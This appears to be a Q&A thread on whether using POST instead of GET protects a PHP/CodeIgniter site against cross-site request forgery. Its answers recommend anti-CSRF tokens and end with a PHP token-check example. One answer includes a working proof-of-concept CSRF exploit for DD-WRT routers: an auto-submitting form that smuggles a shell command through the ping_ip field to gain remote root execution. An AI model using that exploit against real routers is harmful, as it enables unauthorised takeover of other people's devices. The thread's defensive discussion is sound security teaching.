
PHP security using POST instead of GET to protect against XSRF?

I have some URLs like http://mysite.com/module/45/set_name/new-name in my application which are designed to be accessed using ajax.

In order to prevent XSRF I force such requests to be POST requests. With GET it's trivial to generate an XSRF using the following:

<img src="http://mysite.com/module/45/set_name/new-name"/>

Using POST prevents this particular attack but is this actually any more secure than using GET? If not, what else can/should be done?

Thanks.


Edit: I'm using CodeIgniter and have the following in my config:

$config['csrf_protection'] = TRUE;
$config['csrf_token_name'] = 'csrf_test_name';
$config['csrf_cookie_name'] = 'csrf_cookie_name';
$config['csrf_expire'] = 3600;

Am I safe? Are there any downsides to having the CSRF on? Other than forms expiring after an hour?


Using POST alone is not enough because someone can make a form with hidden input elements and automatically submit it to your website. It's not as easy as an img element with a GET request, but it's still possible. What you should use is some form of verification in the POST parameters, like a random value or session token that, unlike cookies, would not be sent in an XSRF request.


No, changing to POST does not solve this problem. You should read the Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet.

Here is an example Proof of Concept POST-based CSRF exploit that I wrote. This gives you remote root access to DD-WRT:

<html>
    <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
        <input name="submit_button" value="Ping" type="hidden">
        <input name="action" value="ApplyTake" type="hidden">
        <input name="submit_type" value="start" type="hidden">
        <input name="change_action" value="gozila_cgi" type="hidden">
        <input name="next_page" value="Diagnostics.asp" type="hidden">
        <input name="ping_ip" value="echo owned">
        <input name="execute command" type="submit">
    </form>
</html>
<script>
    document.getElementById(1).submit();//remote root command execution!
</script>


Why don't you just check the referrer sent along with the request? Both an image src and a JavaScript-submitted form will inform you that the request was sent from a different host, and you can just block that request.


You're taking this problem wrong.
Your real problem is completely different: you're using improper methods.

When the GET method is used properly, to retrieve data from the server, no CSRF attack could ever be possible.

So, if your request alters data on the server side, you have to change it to POST anyway, in spite of all these romantic and scary things like CSRF, XSS and such.
It's just technology basics.

As for CSRF itself, it's not a big deal at all. Just make sure that all your forms contain some anti-CSRF token (also stored in the session) and all POST form handlers verify it.
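The session-token check that this answer and the first answer describe, as an added PHP example (not code from the question, the answers or CodeIgniter; the helper names csrf_token() and csrf_verify() and the field name csrf_token are this example's own). For the ajax URLs in the question the same value would be sent as a POST field or request header:

```php
<?php
// Added example: synchronizer-token CSRF protection for a POST handler.
// One random token per session, emitted as a hidden field and compared
// in constant time on every state-changing request.
declare(strict_types=1);
session_start();

// Hypothetical helper: returns the session's token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 CSPRNG bytes; a cross-site page cannot read the victim's session
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hypothetical helper: true only if the submitted value matches the session token.
function csrf_verify(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || $submitted === null) {
        return false;
    }
    // hash_equals avoids leaking the token through timing differences
    return hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A form auto-submitted from another origin carries the browser's cookies
    // but cannot include this value, so it is rejected before any state changes.
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... apply the state change (e.g. the set_name update) here ...
    exit('Name updated');
}

// GET only renders the form; nothing on the server changes.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="text" name="new_name">
  <button type="submit">Rename</button>
</form>
HTML;
```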

